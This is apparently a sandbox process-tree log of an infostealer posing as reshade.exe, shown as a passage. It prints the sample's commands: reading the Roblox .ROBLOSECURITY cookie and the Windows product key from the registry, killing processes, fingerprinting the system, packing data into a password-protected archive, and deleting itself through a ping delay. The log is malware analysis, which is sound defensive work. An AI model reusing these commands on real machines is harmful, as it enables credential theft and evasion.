AYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:5208
                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\owxtcsaf\owxtcsaf.cmdline"
                                                                                            6⤵
                                                                                              PID:5556
                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2A18.tmp" "c:\Users\Admin\AppData\Local\Temp\owxtcsaf\CSC2F80F2ACF4744D408823625D16CC9BDC.TMP"
                                                                                                7⤵
                                                                                                  PID:5124
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                            4⤵
                                                                                              PID:5192
                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                5⤵
                                                                                                • Drops file in Drivers directory
                                                                                                • Views/modifies file attributes
                                                                                                PID:532
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                              4⤵
                                                                                                PID:4864
                                                                                                • C:\Windows\system32\tree.com
                                                                                                  tree /A /F
                                                                                                  5⤵
                                                                                                    PID:840
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                  4⤵
                                                                                                    PID:5748
                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                      attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                      5⤵
                                                                                                      • Drops file in Drivers directory
                                                                                                      • Views/modifies file attributes
                                                                                                      PID:1908
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                    4⤵
                                                                                                      PID:5660
                                                                                                      • C:\Windows\system32\tree.com
                                                                                                        tree /A /F
                                                                                                        5⤵
                                                                                                          PID:5848
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                        4⤵
                                                                                                          PID:6128
                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                            tasklist /FO LIST
                                                                                                            5⤵
                                                                                                            • Enumerates processes with tasklist
                                                                                                            PID:5608
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                          4⤵
                                                                                                            PID:5688
                                                                                                            • C:\Windows\system32\tree.com
                                                                                                              tree /A /F
                                                                                                              5⤵
                                                                                                                PID:5136
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                              4⤵
                                                                                                                PID:2144
                                                                                                                • C:\Windows\system32\tree.com
                                                                                                                  tree /A /F
                                                                                                                  5⤵
                                                                                                                    PID:5412
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                  4⤵
                                                                                                                    PID:5672
                                                                                                                    • C:\Windows\system32\tree.com
                                                                                                                      tree /A /F
                                                                                                                      5⤵
                                                                                                                        PID:5192
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4960"
                                                                                                                      4⤵
                                                                                                                        PID:6008
                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                          taskkill /F /PID 4960
                                                                                                                          5⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          PID:5772
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4264"
                                                                                                                        4⤵
                                                                                                                          PID:5724
                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                            taskkill /F /PID 4264
                                                                                                                            5⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:5900
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4960"
                                                                                                                          4⤵
                                                                                                                            PID:5988
                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                              taskkill /F /PID 4960
                                                                                                                              5⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:5512
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4628"
                                                                                                                            4⤵
                                                                                                                              PID:5844
                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                taskkill /F /PID 4628
                                                                                                                                5⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:5412
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4628"
                                                                                                                              4⤵
                                                                                                                                PID:5500
                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                  taskkill /F /PID 4628
                                                                                                                                  5⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:5256
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 348"
                                                                                                                                4⤵
                                                                                                                                  PID:5872
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    5⤵
                                                                                                                                      PID:5136
                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                      taskkill /F /PID 348
                                                                                                                                      5⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:5248
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2460"
                                                                                                                                    4⤵
                                                                                                                                      PID:4640
                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                        taskkill /F /PID 2460
                                                                                                                                        5⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:5880
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2460"
                                                                                                                                      4⤵
                                                                                                                                        PID:3156
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          5⤵
                                                                                                                                            PID:532
                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                            taskkill /F /PID 2460
                                                                                                                                            5⤵
                                                                                                                                            • Kills process with taskkill
                                                                                                                                            PID:3268
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3752"
                                                                                                                                          4⤵
                                                                                                                                            PID:5236
                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                              taskkill /F /PID 3752
                                                                                                                                              5⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:2072
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 512"
                                                                                                                                            4⤵
                                                                                                                                              PID:5964
                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                taskkill /F /PID 512
                                                                                                                                                5⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:5544
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 512"
                                                                                                                                              4⤵
                                                                                                                                                PID:5208
                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                  taskkill /F /PID 512
                                                                                                                                                  5⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:5400
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4688"
                                                                                                                                                4⤵
                                                                                                                                                  PID:5736
                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                    taskkill /F /PID 4688
                                                                                                                                                    5⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:5404
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:5372
                                                                                                                                                    • C:\Windows\system32\getmac.exe
                                                                                                                                                      getmac
                                                                                                                                                      5⤵
                                                                                                                                                        PID:5884
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2012"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5176
                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          5⤵
                                                                                                                                                            PID:5440
                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                            taskkill /F /PID 2012
                                                                                                                                                            5⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:5348
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2012"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:5644
                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              5⤵
                                                                                                                                                                PID:6128
                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                taskkill /F /PID 2012
                                                                                                                                                                5⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                PID:5828
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1492"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5332
                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                  taskkill /F /PID 1492
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                  PID:5564
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2608"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:5852
                                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                                    taskkill /F /PID 2608
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                    PID:5708
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4264"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:2904
                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                      taskkill /F /PID 4264
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                      PID:4548
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5056"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:3724
                                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                                        taskkill /F /PID 5056
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        PID:1172
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 348"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:5844
                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                          taskkill /F /PID 348
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                          PID:5580
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1556"
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:3204
                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                            taskkill /F /PID 1556
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:4876
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3752"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:6140
                                                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                                                              taskkill /F /PID 3752
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                              PID:4260
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:5392
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                PID:5132
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4688"
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:5792
                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                  taskkill /F /PID 4688
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                  PID:5976
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:6124
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    PID:5128
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1492"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:5776
                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:5896
                                                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                        taskkill /F /PID 1492
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                        PID:5352
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5056"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:6072
                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:4420
                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                            taskkill /F /PID 5056
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                            PID:6088
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1556"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:5360
                                                                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                              taskkill /F /PID 1556
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                              PID:6024
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2608"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:5508
                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:5772
                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                  taskkill /F /PID 2608
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                  PID:5660
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI24122\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\wdX5U.zip" *"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:2788
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI24122\rar.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\_MEI24122\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\wdX5U.zip" *
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:5512
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:5752
                                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                      wmic os get Caption
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:6020
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:5412
                                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                          wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:5032
                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:1028
                                                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                              wmic csproduct get uuid
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:3724
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:5664
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  PID:5204
                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:5580
                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                    wmic path win32_VideoController get name
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                    • Detects videocard installed
                                                                                                                                                                                                                    PID:5836
                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:6000
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                      PID:3792
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Downloads\reshade.exe""
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:5792
                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                        ping localhost -n 3
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                        PID:3148
                                                                                                                                                                                                                • C:\Users\Admin\Downloads\reshade.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Downloads\reshade.exe"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:5420
                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\reshade.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\reshade.exe"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                    PID:5560
                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:3048
                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=1000 /prefetch:8
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:2608
                                                                                                                                                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:5016
                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                      PID:1284
                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff94c22ab58,0x7ff94c22ab68,0x7ff94c22ab78
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:2272
                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1808 --field-trial-handle=2072,i,7433211318270306172,13542622950353441766,131072 /prefetch:2
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:772
                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=2072,i,7433211318270306172,13542622950353441766,131072 /prefetch:8
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:2540
                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2168 --field-trial-handle=2072,i,7433211318270306172,13542622950353441766,131072 /prefetch:8
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:1656
                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3036 --field-trial-handle=2072,i,7433211318270306172,13542622950353441766,131072 /prefetch:1
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:1624
                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3044 --field-trial-handle=2072,i,7433211318270306172,13542622950353441766,131072 /prefetch:1
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:1412
                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4484 --field-trial-handle=2072,i,7433211318270306172,13542622950353441766,131072 /prefetch:1
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:5788
                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4668 --field-trial-handle=2072,i,7433211318270306172,13542622950353441766,131072 /prefetch:8
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:5804
                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4780 --field-trial-handle=2072,i,7433211318270306172,13542622950353441766,131072 /prefetch:8
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:5744
                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4296 --field-trial-handle=2072,i,7433211318270306172,13542622950353441766,131072 /prefetch:8
                                                                                                                                                                                                                                          2⤵
